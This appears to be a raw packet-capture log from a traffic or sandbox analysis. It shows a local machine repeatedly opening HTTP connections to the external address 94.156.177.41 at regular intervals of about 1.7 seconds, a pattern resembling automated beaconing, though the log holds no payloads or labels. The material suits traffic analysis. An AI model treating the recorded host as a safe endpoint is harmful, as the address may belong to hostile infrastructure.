                                                                          Nov 22, 2024 17:39:01.010855913 CET804976994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:01.010906935 CET4976980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:01.131407022 CET804976994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:01.149786949 CET4977580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:01.269344091 CET804977594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:01.269783020 CET4977580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:01.271894932 CET4977580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:01.391530991 CET804977594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:01.391644955 CET4977580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:01.512151957 CET804977594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:02.801037073 CET804977594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:02.801172972 CET4977580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:02.801379919 CET804977594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:02.801434040 CET4977580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:02.920927048 CET804977594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:02.945754051 CET4978180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:03.065608978 CET804978194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:03.065876961 CET4978180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:03.067959070 CET4978180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:03.187405109 CET804978194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:03.187494993 CET4978180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:03.307110071 CET804978194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:04.480725050 CET804978194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:04.480839968 CET804978194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:04.480951071 CET4978180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:04.481015921 CET4978180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:04.600570917 CET804978194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:04.628365040 CET4978780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:04.748048067 CET804978794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:04.750089884 CET4978780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:04.751878023 CET4978780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:04.873462915 CET804978794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:04.874345064 CET4978780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:04.994447947 CET804978794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:06.235555887 CET804978794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:06.235800982 CET804978794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:06.235877037 CET4978780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:06.235929966 CET4978780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:06.355478048 CET804978794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:06.378495932 CET4978880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:06.499408007 CET804978894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:06.499619007 CET4978880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:06.501547098 CET4978880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:06.624631882 CET804978894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:06.624696970 CET4978880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:06.745925903 CET804978894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:07.860249996 CET804978894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:07.860367060 CET804978894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:07.860410929 CET4978880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:07.860447884 CET4978880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:07.980187893 CET804978894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:08.004100084 CET4979480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:08.125183105 CET804979494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:08.125297070 CET4979480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:08.127332926 CET4979480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:08.248356104 CET804979494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:08.251882076 CET4979480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:08.373492002 CET804979494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:09.681982994 CET804979494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:09.682146072 CET4979480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:09.682370901 CET804979494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:09.682441950 CET4979480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:09.802908897 CET804979494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:09.832218885 CET4980080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:09.951980114 CET804980094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:09.952083111 CET4980080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:09.955069065 CET4980080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:10.074831009 CET804980094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:10.075035095 CET4980080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:10.195442915 CET804980094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:11.305012941 CET804980094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:11.305165052 CET804980094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:11.305203915 CET4980080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:11.305252075 CET4980080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:11.424820900 CET804980094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:11.451225996 CET4980680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:11.570990086 CET804980694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:11.571108103 CET4980680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:11.574165106 CET4980680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:11.694134951 CET804980694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:11.694205046 CET4980680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:11.816440105 CET804980694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:13.054687023 CET804980694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:13.054754972 CET804980694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:13.054806948 CET4980680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:13.054968119 CET4980680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:13.174860954 CET804980694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:13.207679987 CET4980780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:13.327430964 CET804980794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:13.327531099 CET4980780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:13.330580950 CET4980780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:13.452759027 CET804980794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:13.452853918 CET4980780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:13.572524071 CET804980794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:14.727401018 CET804980794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:14.727694988 CET804980794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:14.727840900 CET4980780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:14.727955103 CET4980780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:14.848103046 CET804980794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:14.862828970 CET4981480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:14.982588053 CET804981494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:14.982724905 CET4981480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:14.984954119 CET4981480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:15.106004953 CET804981494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:15.106128931 CET4981480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:15.225786924 CET804981494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:16.480851889 CET804981494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:16.480959892 CET804981494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:16.481024027 CET4981480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:16.481060982 CET4981480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:16.600800037 CET804981494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:16.630595922 CET4982080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:16.750190973 CET804982094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:16.751986027 CET4982080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:16.753679037 CET4982080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:16.873368979 CET804982094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:16.873575926 CET4982080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:16.993340969 CET804982094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:18.289005995 CET804982094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:18.289077044 CET804982094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:18.289205074 CET4982080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:18.289644957 CET4982080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:18.412864923 CET804982094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:18.529416084 CET4982680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:18.650351048 CET804982694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:18.650458097 CET4982680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:18.652259111 CET4982680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:18.772546053 CET804982694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:18.772634029 CET4982680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:18.892538071 CET804982694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:20.131437063 CET804982694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:20.131473064 CET804982694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:20.131550074 CET4982680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:20.131692886 CET4982680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:20.251127005 CET804982694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:20.269785881 CET4983080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:20.389367104 CET804983094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:20.391848087 CET4983080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:20.393621922 CET4983080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:20.513151884 CET804983094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:20.515913963 CET4983080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:20.636499882 CET804983094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:21.922034025 CET804983094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:21.922180891 CET804983094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:21.922261953 CET4983080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:21.922321081 CET4983080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:22.044326067 CET804983094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:22.066808939 CET4983480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:22.186733007 CET804983494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:22.186948061 CET4983480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:22.188827991 CET4983480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:22.314522982 CET804983494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:22.314599991 CET4983480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:22.439863920 CET804983494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:23.676054955 CET804983494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:23.676175117 CET4983480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:23.676268101 CET804983494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:23.676318884 CET4983480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:23.796269894 CET804983494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:23.824381113 CET4983980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:23.944221020 CET804983994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:23.944381952 CET4983980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:23.947361946 CET4983980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:24.067006111 CET804983994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:24.067070961 CET4983980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:24.186597109 CET804983994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:25.302767992 CET804983994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:25.302884102 CET804983994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:25.302977085 CET4983980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:25.303193092 CET4983980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:25.422629118 CET804983994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:25.454355955 CET4984580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:25.574307919 CET804984594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:25.574544907 CET4984580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:25.577486992 CET4984580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:25.697432995 CET804984594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:25.697513103 CET4984580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:25.817264080 CET804984594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:27.054007053 CET804984594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:27.054131985 CET804984594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:27.054176092 CET4984580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:27.054210901 CET4984580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:27.173858881 CET804984594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:27.193262100 CET4985180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:27.313162088 CET804985194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:27.313330889 CET4985180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:27.315241098 CET4985180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:27.435455084 CET804985194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:27.435691118 CET4985180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:27.555305004 CET804985194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:28.888890028 CET804985194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:28.889019012 CET4985180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:28.889079094 CET804985194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:28.889134884 CET4985180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:29.008703947 CET804985194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:29.035540104 CET4985380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:29.155242920 CET804985394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:29.155498981 CET4985380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:29.157468081 CET4985380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:29.277345896 CET804985394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:29.277427912 CET4985380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:29.397070885 CET804985394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:30.602054119 CET804985394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:30.602082014 CET804985394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:30.602180004 CET4985380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:30.602238894 CET4985380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:30.723331928 CET804985394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:30.738857031 CET4985880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:30.858542919 CET804985894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:30.858638048 CET4985880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:30.860815048 CET4985880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:30.980386972 CET804985894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:30.980501890 CET4985880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:31.100344896 CET804985894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:32.319843054 CET804985894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:32.319974899 CET4985880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:32.320007086 CET804985894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:32.320063114 CET4985880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:32.439587116 CET804985894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:32.460311890 CET4986480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:32.580173016 CET804986494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:32.580312967 CET4986480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:32.582351923 CET4986480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:32.779086113 CET804986494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:32.779201984 CET4986480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:32.934107065 CET804986494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:34.064419031 CET804986494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:34.064527035 CET4986480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:34.064604044 CET804986494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:34.064646006 CET4986480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:34.184104919 CET804986494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:34.212327003 CET4986980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:34.331859112 CET804986994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:34.331958055 CET4986980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:34.334594965 CET4986980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:34.454606056 CET804986994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:34.454699993 CET4986980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:34.574393988 CET804986994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:35.909826040 CET804986994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:35.909848928 CET804986994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:35.909914970 CET4986980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:35.910069942 CET4986980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:36.030122995 CET804986994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:36.391951084 CET4987580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:36.511449099 CET804987594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:36.511543036 CET4987580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:36.518543959 CET4987580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:36.638083935 CET804987594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:36.638263941 CET4987580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:36.757836103 CET804987594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:37.911163092 CET804987594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:37.911422968 CET804987594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:37.911434889 CET4987580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:37.911483049 CET4987580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:38.031130075 CET804987594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:38.073164940 CET4987880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:38.192841053 CET804987894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:38.195971966 CET4987880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:38.199114084 CET4987880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:38.319088936 CET804987894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:38.319160938 CET4987880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:38.438910961 CET804987894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:39.774283886 CET804987894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:39.774358034 CET804987894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:39.774405003 CET4987880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:39.774466991 CET4987880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:39.893944025 CET804987894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:39.911514997 CET4988380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:40.031264067 CET804988394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:40.031404018 CET4988380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:40.033540964 CET4988380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:40.156470060 CET804988394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:40.156593084 CET4988380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:40.276273966 CET804988394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:41.435794115 CET804988394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:41.435904026 CET804988394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:41.435945988 CET4988380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:41.435991049 CET4988380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:41.556668997 CET804988394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:41.590384960 CET4988980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:41.709949017 CET804988994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:41.710035086 CET4988980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:41.712372065 CET4988980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:41.831861019 CET804988994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:41.832001925 CET4988980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:41.951833963 CET804988994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:43.209742069 CET804988994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:43.209940910 CET4988980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:43.211462021 CET804988994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:43.211534023 CET4988980192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:43.330265999 CET804988994.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:43.356964111 CET4989480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:43.476849079 CET804989494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:43.476964951 CET4989480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:43.480339050 CET4989480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:43.599814892 CET804989494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:43.599899054 CET4989480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:43.719422102 CET804989494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:44.928255081 CET804989494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:44.928389072 CET4989480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:44.928430080 CET804989494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:44.928484917 CET4989480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:45.051310062 CET804989494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:45.065685034 CET4989880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:45.185334921 CET804989894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:45.185427904 CET4989880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:45.187427044 CET4989880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:45.307025909 CET804989894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:45.307094097 CET4989880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:45.426630974 CET804989894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:46.763998985 CET804989894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:46.764098883 CET804989894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:46.764115095 CET4989880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:46.764152050 CET4989880192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:46.887092113 CET804989894.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:46.910146952 CET4990280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:47.032720089 CET804990294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:47.032844067 CET4990280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:47.035160065 CET4990280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:47.159826040 CET804990294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:47.159996986 CET4990280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:47.284257889 CET804990294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:48.566066980 CET804990294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:48.566159964 CET804990294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:48.566330910 CET4990280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:48.566330910 CET4990280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:48.686602116 CET804990294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:48.927112103 CET4990780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:49.046622992 CET804990794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:49.046719074 CET4990780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:49.049055099 CET4990780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:49.169121981 CET804990794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:49.169188976 CET4990780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:49.290102005 CET804990794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:50.496753931 CET804990794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:50.496933937 CET804990794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:50.496974945 CET4990780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:50.497009993 CET4990780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:50.616894007 CET804990794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:50.651004076 CET4991380192.168.2.494.156.177.41
